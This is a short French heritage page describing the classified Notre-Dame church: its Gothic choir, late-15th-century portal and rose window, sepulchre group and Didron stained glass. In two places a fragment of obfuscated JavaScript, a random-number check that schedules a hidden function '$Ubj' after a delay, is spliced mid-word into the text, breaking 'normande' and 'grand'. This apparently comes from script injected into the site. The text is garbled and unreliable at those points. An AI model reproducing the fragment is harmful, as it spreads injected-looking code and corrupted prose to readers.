L’église Notre-Dame

Accueil > Monuments historiques > L’église Notre-Dame

Classée au titre des Monuments Historiques, l’église Notre-Dame est une très intéressante construction où se trouvent exprimés quelques traits bien caractéristiques de l’architecture de l’École normandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}ande, notamment dans le chœur gothique attribué au XIIIe siècle.
Le clocher-porche comporte un portail de la fin du XVe siècle à arcade ogivale qui encadre un tympan à jour. Au-dessus du portail est édifiée une rose de style flamboyant. La nef, flanquée de deux collatéraux, est construite au XIIIe siècle, mais est très remaniée aux XVIe et XVIIe siècles. Elle présente une élévation intérieure à 3 niveaux.

Seule subsiste de l’église romane primitive la base de l’ancienne tour-lanterne. Visible uniquement de l’extérieur, elle est située à la croisée du transept.

L’église comporte quelques singularités :

-Le sépulcre datant du XVe siècle, représentant le Christ étendu sur un linceul, Nicodème, Joseph d’Arimathie, Saint-Jean l’Évangéliste, la Vierge Marie et Marie-Madeleine.

-Les vitraux sont attribués pour la majeure partie à Édouard Didron, grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}and maître verrier parisien.